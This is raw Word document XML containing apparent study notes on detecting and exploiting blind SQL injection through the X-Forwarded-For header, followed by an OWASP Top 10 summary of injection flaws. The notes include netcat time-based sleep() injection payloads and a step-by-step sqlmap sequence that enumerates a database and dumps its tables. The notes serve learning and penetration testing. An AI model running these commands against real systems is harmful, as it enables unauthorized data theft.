    <w:p w14:paraId="4CF1EE39" w14:textId="5715F01E" w:rsidR="00767C29" w:rsidRDefault="00767C29" w:rsidP="00767C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Detection and Exploitation of SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA9A236" w14:textId="051A86CD" w:rsidR="00767C29" w:rsidRDefault="00767C29" w:rsidP="00767C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Detection of SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B224E3" w14:textId="5E1F9999" w:rsidR="00767C29" w:rsidRDefault="00767C29" w:rsidP="00767C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>blind SQL injection cannot be detected or triggers if browser is being used for other purposes besides using extensions to track/forge HTTP traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D545CA4" w14:textId="5FD8143B" w:rsidR="00767C29" w:rsidRDefault="00767C29" w:rsidP="00767C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>need to use proxy or a tool like netcat, or code to find it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D054E" w14:textId="35D013AD" w:rsidR="00767C29" w:rsidRDefault="00767C29" w:rsidP="00767C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>GPC suspects – GET, POST, Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F9A35" w14:textId="5934FB95" w:rsidR="00767C29" w:rsidRDefault="00767C29" w:rsidP="00767C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>additionally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A4704C" w14:textId="3102013B" w:rsidR="00767C29" w:rsidRDefault="00767C29" w:rsidP="00767C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>User-Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F5F22D" w14:textId="27CDA916" w:rsidR="00767C29" w:rsidRDefault="00767C29" w:rsidP="00767C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>obvious and easy to manipulate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225584A0" w14:textId="17DC7F98" w:rsidR="00767C29" w:rsidRDefault="00767C29" w:rsidP="00767C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0117B274" w14:textId="201E9276" w:rsidR="00767C29" w:rsidRDefault="00767C29" w:rsidP="00767C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>requires isolating Host header in request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CBC156" w14:textId="4FE56BAB" w:rsidR="00767C29" w:rsidRDefault="00767C29" w:rsidP="00767C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>X-Forward-For and X-Forwarded-Host headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F605ECE" w14:textId="322F02C0" w:rsidR="00767C29" w:rsidRDefault="00767C29" w:rsidP="00767C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>X-Forwarded-For gets IP of client when behind reverse proxy (as opposed to $_SERVER[‘REMOTE_ADDR’] which would prevent proper auditing and logging)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50895A1D" w14:textId="35B0C9A5" w:rsidR="00000FCC" w:rsidRDefault="00000FCC" w:rsidP="00000FCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>injection a function that will take a long time to get processed and see if function is called by observing how much time the pages takes to load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A349BA0" w14:textId="12ADA03A" w:rsidR="00000FCC" w:rsidRDefault="00000FCC" w:rsidP="00000FCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQLmap does not test for this by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F32E7A" w14:textId="7F16BED5" w:rsidR="00000FCC" w:rsidRDefault="00000FCC" w:rsidP="00000FCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Time-Based Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A3E4FF" w14:textId="5EB7A577" w:rsidR="00000FCC" w:rsidRDefault="00000FCC" w:rsidP="00000FCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00000FCC">
        <w:t>$ echo "GET / HTTP/1.0\r\nX-Forwarded-For: hacker' or sleep(4) and '1'='1\r\nConnection: close\r\n\r\n" | netcat vulnerable 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46539DAC" w14:textId="0CF1CDEA" w:rsidR="00000FCC" w:rsidRDefault="00000FCC" w:rsidP="00000FCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>takes longer than</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3375388A" w14:textId="098E0297" w:rsidR="00000FCC" w:rsidRDefault="00000FCC" w:rsidP="00000FCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00000FCC">
        <w:t>$ echo "GET / HTTP/1.0\r\nX-Forwarded-For: hacker' or sleep(0) and '1'='1\r\nConnection: close\r\n\r\n" | netcat vulnerable 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2806238A" w14:textId="29E89110" w:rsidR="00000FCC" w:rsidRDefault="00000FCC" w:rsidP="00000FCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>due ‘or sleep()’ variable (must use or, not and)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A11CAEF" w14:textId="0EF80C8D" w:rsidR="00000FCC" w:rsidRDefault="00000FCC" w:rsidP="00000FCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation of Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D063AAA" w14:textId="753E6BCE" w:rsidR="00000FCC" w:rsidRDefault="00000FCC" w:rsidP="00000FCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Manual Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BAC381" w14:textId="4BD4D8A0" w:rsidR="00000FCC" w:rsidRDefault="00000FCC" w:rsidP="00000FCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Traditional Blind SQLi has two states (true/slow and false/quick)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F873EEE" w14:textId="12FF1FBF" w:rsidR="0014025D" w:rsidRDefault="0014025D" w:rsidP="0014025D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation with SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6071A898" w14:textId="0E07CD4D" w:rsidR="0014025D" w:rsidRDefault="0014025D" w:rsidP="0014025D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>tricky, need to use * wildcard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5BB8D8" w14:textId="01DFAB88" w:rsidR="0014025D" w:rsidRDefault="0014025D" w:rsidP="0014025D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. python sqlmap.py -u </w:t>
      </w:r>
      <w:r w:rsidR="002B283A">
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidR="002B283A" w:rsidRPr="00983573">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://vulnerable/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002B283A">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - -headers=”X-Forwarded-For: *” - -banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2796A1DA" w14:textId="136051DE" w:rsidR="0014025D" w:rsidRDefault="0014025D" w:rsidP="0014025D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>banner will eventually be returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7131790D" w14:textId="315876DF" w:rsidR="0014025D" w:rsidRDefault="0014025D" w:rsidP="0014025D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>retrieve information by using - -dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D5215B" w14:textId="4F3ED473" w:rsidR="0014025D" w:rsidRDefault="0014025D" w:rsidP="0014025D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python sqlmap.py -u </w:t>
      </w:r>
      <w:r w:rsidR="002B283A">
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidR="002B283A" w:rsidRPr="00983573">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://vulnerable/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002B283A">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - -headers=”X-Forwarded-For: *” - -dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527ABCD1" w14:textId="59536A45" w:rsidR="0014025D" w:rsidRDefault="0014025D" w:rsidP="0014025D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>now use - -tables command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7020B048" w14:textId="116530A9" w:rsidR="0014025D" w:rsidRDefault="0014025D" w:rsidP="0014025D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python sqlmap.py -u </w:t>
      </w:r>
      <w:r w:rsidR="002B283A">
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidR="002B283A" w:rsidRPr="00983573">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://vulnerable/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>” - -headers=”X-Forwarded-For: *” – D &lt;</w:t>
      </w:r>
      <w:r w:rsidR="002B283A">
        <w:t xml:space="preserve">database </w:t>
      </w:r>
      <w:r>
        <w:t>name&gt; - -tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D8EFF4" w14:textId="2509745D" w:rsidR="0014025D" w:rsidRDefault="0014025D" w:rsidP="0014025D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>now use -T for tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C1E634" w14:textId="47018E41" w:rsidR="0014025D" w:rsidRDefault="0014025D" w:rsidP="0014025D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python sqlmap.py -u </w:t>
      </w:r>
      <w:r w:rsidR="002B283A">
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r w:rsidR="002B283A" w:rsidRPr="00983573">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://vulnerable/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002B283A">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:t>- -headers=”X-Forwarded-For: *” -D &lt;database</w:t>
      </w:r>
      <w:r w:rsidR="002B283A">
        <w:t xml:space="preserve"> name&gt; -T &lt;table name&gt; - -columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEC18D8" w14:textId="229EA9F4" w:rsidR="002B283A" w:rsidRDefault="002B283A" w:rsidP="002B283A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>now use - -dump - -batch to dump information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEAC31E" w14:textId="75A57E5C" w:rsidR="002B283A" w:rsidRDefault="002B283A" w:rsidP="002B283A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>python sqlmap.py -u “http://vulnerable/”  - - headers=”X-Forwarded-For: *” -D &lt;database name&gt; -T &lt;table name&gt; - -dump - -batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED9910" w14:textId="1DFDCDF2" w:rsidR="002B283A" w:rsidRDefault="002B283A" w:rsidP="002B283A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can also use - -exclude-sysdbs to avoid dumping system databases and only retrieve non-default ones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD281C6" w14:textId="7BB2EF5B" w:rsidR="002B283A" w:rsidRDefault="002B283A" w:rsidP="002B283A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Access to the administration pages and code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9571EB" w14:textId="1A83F127" w:rsidR="002B283A" w:rsidRPr="00F512ED" w:rsidRDefault="002B283A" w:rsidP="002B283A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>php uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FCB695" w14:textId="735CBFA3" w:rsidR="00634A1B" w:rsidRPr="00F512ED" w:rsidRDefault="00634A1B" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17786477" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B2E75A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A620B0F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Common flaw in applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4F3476" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Occur because user controlled input is interpreted as actual commands or parameters by application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9C7B64" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Dependent on technology used and how input is interpreted </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41369414" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>SQL Injection – controlled input is passed to SQL queries, manipulating outcome of said queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DB9A8E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Command Injection – user input is passed to system commands. Execute arbitrary system commands on application servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C52AE1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If input is passed and interpreted correctly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0AC5CB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Access, modify, delete information in a database – leading to the stealing of sensitive information such as personal details and credentials</w:t>
      </w:r>
    </w:p>
